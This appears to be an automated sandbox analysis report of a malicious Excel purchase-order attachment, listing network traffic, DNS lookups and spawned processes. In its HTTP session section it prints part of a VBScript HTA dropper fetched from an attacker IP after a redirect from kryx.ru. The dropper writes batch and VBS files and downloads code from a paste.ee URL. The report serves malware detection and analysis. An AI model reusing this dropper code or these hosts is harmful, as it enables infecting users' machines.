                                        Mar 17, 2025 09:42:52.172013044 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.173758984 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.173849106 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.173908949 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.173926115 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.173966885 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.175801992 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.220324993 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.494265079 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.494364023 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.494370937 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.494415045 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.497657061 CET55218443192.168.2.24188.225.72.170
                                        Mar 17, 2025 09:42:52.497674942 CET44355218188.225.72.170192.168.2.24
                                        Mar 17, 2025 09:42:52.499150991 CET5521980192.168.2.24198.12.89.24
                                        Mar 17, 2025 09:42:52.504128933 CET8055219198.12.89.24192.168.2.24
                                        Mar 17, 2025 09:42:52.504215002 CET5521980192.168.2.24198.12.89.24
                                        Mar 17, 2025 09:42:52.504369020 CET5521980192.168.2.24198.12.89.24
                                        Mar 17, 2025 09:42:52.509702921 CET8055219198.12.89.24192.168.2.24
                                        Mar 17, 2025 09:42:52.978606939 CET8055219198.12.89.24192.168.2.24
                                        Mar 17, 2025 09:42:52.978651047 CET8055219198.12.89.24192.168.2.24
                                        Mar 17, 2025 09:42:52.978662968 CET8055219198.12.89.24192.168.2.24
                                        Mar 17, 2025 09:42:52.978820086 CET5521980192.168.2.24198.12.89.24
                                        Mar 17, 2025 09:42:57.974914074 CET8055219198.12.89.24192.168.2.24
                                        Mar 17, 2025 09:42:57.975084066 CET5521980192.168.2.24198.12.89.24
                                        Mar 17, 2025 09:43:06.457772970 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:06.457823992 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:06.457997084 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:06.458096027 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:06.458115101 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:06.458206892 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:06.458622932 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:06.458636999 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:06.458718061 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:06.458734035 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.129956007 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.130089045 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.131673098 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.131854057 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.135261059 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.135268927 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.135565042 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.137387991 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.137417078 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.137680054 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.148442030 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.149132967 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.192336082 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.196340084 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.253603935 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.253693104 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.253890991 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.255218029 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.255234003 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.255394936 CET55224443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.255400896 CET4435522413.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.268548012 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.268582106 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.268651962 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.268676996 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.269046068 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.269326925 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.269356966 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:07.269752026 CET55223443192.168.2.2413.107.253.72
                                        Mar 17, 2025 09:43:07.269769907 CET4435522313.107.253.72192.168.2.24
                                        Mar 17, 2025 09:43:50.044606924 CET5521980192.168.2.24198.12.89.24
                                        Mar 17, 2025 09:43:50.049371004 CET8055219198.12.89.24192.168.2.24
                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 17, 2025 09:42:34.144541979 CET5364438162.159.36.2192.168.2.24
                                        Mar 17, 2025 09:42:34.653378963 CET53529451.1.1.1192.168.2.24
                                        Mar 17, 2025 09:42:51.363815069 CET5294553192.168.2.241.1.1.1
                                        Mar 17, 2025 09:42:51.462840080 CET53529451.1.1.1192.168.2.24
                                        Mar 17, 2025 09:43:06.447721004 CET5294553192.168.2.241.1.1.1
                                        Mar 17, 2025 09:43:06.456486940 CET53529451.1.1.1192.168.2.24
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Mar 17, 2025 09:42:51.363815069 CET192.168.2.241.1.1.10x659bStandard query (0)kryx.ruA (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.447721004 CET192.168.2.241.1.1.10xa3aaStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Mar 17, 2025 09:42:01.892172098 CET1.1.1.1192.168.2.240xa561No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:42:01.892172098 CET1.1.1.1192.168.2.240xa561No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:42:01.892172098 CET1.1.1.1192.168.2.240xa561No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:42:02.721993923 CET1.1.1.1192.168.2.240x27f1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:42:02.721993923 CET1.1.1.1192.168.2.240x27f1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:42:51.462840080 CET1.1.1.1192.168.2.240x659bNo error (0)kryx.ru188.225.72.170A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:42:59.359150887 CET1.1.1.1192.168.2.240x846eNo error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:42:59.359150887 CET1.1.1.1192.168.2.240x846eNo error (0)a726.dscd.akamai.net95.101.54.235A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:42:59.359150887 CET1.1.1.1192.168.2.240x846eNo error (0)a726.dscd.akamai.net2.16.202.10A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:04.213052034 CET1.1.1.1192.168.2.240xcb9cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:06.456486940 CET1.1.1.1192.168.2.240xa3aaNo error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:15.972908020 CET1.1.1.1192.168.2.240xc311No error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                        Mar 17, 2025 09:43:15.972908020 CET1.1.1.1192.168.2.240xc311No error (0)a726.dscd.akamai.net95.101.54.226A (IP address)IN (0x0001)false
                                        Mar 17, 2025 09:43:15.972908020 CET1.1.1.1192.168.2.240xc311No error (0)a726.dscd.akamai.net95.101.54.235A (IP address)IN (0x0001)false
                                        • kryx.ru
                                        • otelrules.svc.static.microsoft
                                        • 198.12.89.24
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2455219198.12.89.24805228C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        TimestampBytes transferredDirectionData
                                        Mar 17, 2025 09:42:52.504369020 CET286OUTGET /xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Connection: Keep-Alive
                                        Host: 198.12.89.24
                                        Mar 17, 2025 09:42:52.978606939 CET1236INHTTP/1.1 200 OK
                                        Date: Mon, 17 Mar 2025 08:42:52 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                        Last-Modified: Mon, 17 Mar 2025 08:37:44 GMT
                                        ETag: "789-63085b3c0bdae"
                                        Accept-Ranges: bytes
                                        Content-Length: 1929
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/hta
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 65 63 75 74 61 72 20 53 63 72 69 70 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 0d 0a 20 20 20 20 20 20 20 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 22 0d 0a 20 20 20 20 20 20 20 20 42 4f 52 44 45 52 3d 22 6e 6f 6e 65 22 0d 0a 20 20 20 20 20 20 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 49 4e 47 4c 45 49 4e 53 54 41 4e 43 45 3d 22 79 65 73 22 0d 0a 20 20 20 20 20 20 20 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 0d 0a 20 20 20 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 70 61 6c 6d 61 72 69 75 6d 0d 0a 20 20 20 20 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html><head> <title>Executar Script</title> <HTA:APPLICATION APPLICATIONNAME="ScriptExecutor" BORDER="none" CAPTION="no" SHOWINTASKBAR="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" /> <script language="VBScript"> Dim palmarium Set palmarium = CreateObject("WScript.Shell") Dim porogenic porogenic = "C:\Windows\Temp\serjeant.bat" Dim degradative, puckishly Set degradative = CreateObject("Scripting.FileSystemObject") Set puckishly = degradative.CreateTextFile(porogenic, True) puckishly.WriteLine "@echo off" puckishly.WriteLine "setlocal" puckishly.WriteLine "set ""fugues=C:\Windows\Temp\statcoulomb.vbs""" puckishly.WriteLine ">" & """%fugues%""" & " (" puckishly.WriteLine " ec
                                        Mar 17, 2025 09:42:52.978651047 CET224INData Raw: 68 6f 20 44 69 6d 20 6e 6f 6e 63 61 74 61 6c 6f 67 2c 20 64 6f 63 75 6d 65 6e 74 61 72 69 73 74 22 0d 0a 20 20 20 20 20 20 20 20 70 75 63 6b 69 73 68 6c 79 2e 57 72 69 74 65 4c 69 6e 65 20 22 20 20 20 20 65 63 68 6f 20 6e 6f 6e 63 61 74 61 6c 6f
                                        Data Ascii: ho Dim noncatalog, documentarist" puckishly.WriteLine " echo noncatalog = ""https://paste.ee/d/JXMIrE0h/0""" puckishly.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)"
                                        Mar 17, 2025 09:42:52.978662968 CET785INData Raw: 20 70 75 63 6b 69 73 68 6c 79 2e 57 72 69 74 65 4c 69 6e 65 20 22 20 20 20 20 65 63 68 6f 20 64 6f 63 75 6d 65 6e 74 61 72 69 73 74 2e 6f 70 65 6e 20 22 22 47 45 54 22 22 2c 20 6e 6f 6e 63 61 74 61 6c 6f 67 2c 20 46 61 6c 73 65 22 0d 0a 20 20 20
                                        Data Ascii: puckishly.WriteLine " echo documentarist.open ""GET"", noncatalog, False" puckishly.WriteLine " echo documentarist.send" puckishly.WriteLine " echo If documentarist.Status = 200 Then" puckishly.WriteLine "


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2455218188.225.72.1704435228C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        TimestampBytes transferredDirectionData
                                        2025-03-17 08:42:52 UTC266OUTGET /e3EPl0?&birdcage=long&mail=super&helium=heartbreaking&support HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: kryx.ru
                                        Connection: Keep-Alive
                                        2025-03-17 08:42:52 UTC509INHTTP/1.1 302 Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Mon, 17 Mar 2025 08:42:52 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 118
                                        Connection: close
                                        X-DNS-Prefetch-Control: off
                                        X-Frame-Options: SAMEORIGIN
                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                        X-Download-Options: noopen
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Location: http://198.12.89.24/xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped
                                        Vary: Accept
                                        2025-03-17 08:42:52 UTC118INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 38 39 2e 32 34 2f 78 61 6d 70 70 2f 61 6e 67 65 6c 2f 63 65 73 67 72 65 61 74 6e 65 73 73 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 6f 6f 64 67 69 72 6c 73 68 65 69 73 2e 68 74 61 3f 26 62 61 6c 69 6e 65 73 65 3d 73 74 65 72 65 6f 74 79 70 65 64
                                        Data Ascii: Found. Redirecting to http://198.12.89.24/xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.245522313.107.253.724435228C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        TimestampBytes transferredDirectionData
                                        2025-03-17 08:43:07 UTC215OUTGET /rules/rule120201v19s19.xml HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept-Encoding: gzip
                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                        Host: otelrules.svc.static.microsoft
                                        2025-03-17 08:43:07 UTC515INHTTP/1.1 200 OK
                                        Date: Mon, 17 Mar 2025 08:43:07 GMT
                                        Content-Type: text/xml
                                        Content-Length: 2781
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: public, max-age=604800, immutable
                                        Last-Modified: Tue, 31 Dec 2024 22:07:50 GMT
                                        ETag: "0x8DD29E791389B5C"
                                        x-ms-request-id: d5ea9cad-301e-006e-4c17-97f018000000
                                        x-ms-version: 2018-03-28
                                        x-azure-ref: 20250317T084307Z-r1985965d79k7tbxhC1MNZe7qn00000005y000000000des6
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache: TCP_HIT
                                        X-Cache-Info: L1_T2
                                        Accept-Ranges: bytes
                                        2025-03-17 08:43:07 UTC2781INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 32 30 31 22 20 56 3d 22 31 39 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 73 61 67 65 2e 43 6c 69 63 6b 53 74 72 65 61 6d 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 55 73 61 67 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20
                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120201" V="19" DC="SM" EN="Office.System.SystemHealthUsage.ClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns=""> <RIS>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.245522413.107.253.724435228C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        TimestampBytes transferredDirectionData
                                        2025-03-17 08:43:07 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept-Encoding: gzip
                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                        Host: otelrules.svc.static.microsoft
                                        2025-03-17 08:43:07 UTC491INHTTP/1.1 200 OK
                                        Date: Mon, 17 Mar 2025 08:43:07 GMT
                                        Content-Type: text/xml
                                        Content-Length: 461
                                        Connection: close
                                        Cache-Control: public, max-age=604800, immutable
                                        Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                                        ETag: "0x8DD04C77BDE7614"
                                        x-ms-request-id: 0c8a6be1-601e-0050-24e8-962c9c000000
                                        x-ms-version: 2018-03-28
                                        x-azure-ref: 20250317T084307Z-r1bcb8df696sv9fhhC1MNZvvnc0000000120000000008vvy
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2025-03-17 08:43:07 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:04:41:57
                                        Start date:17/03/2025
                                        Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x7ff7e0a80000
                                        File size:70'082'712 bytes
                                        MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:12
                                        Start time:04:42:52
                                        Start date:17/03/2025
                                        Path:C:\Windows\System32\mshta.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                                        Imagebase:0x7ff6f1bb0000
                                        File size:32'768 bytes
                                        MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:13
                                        Start time:04:43:01
                                        Start date:17/03/2025
                                        Path:C:\Windows\splwow64.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\splwow64.exe 12288
                                        Imagebase:0x7ff73c840000
                                        File size:192'512 bytes
                                        MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:16
                                        Start time:04:43:14
                                        Start date:17/03/2025
                                        Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx"
                                        Imagebase:0x7ff7e0a80000
                                        File size:70'082'712 bytes
                                        MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        No disassembly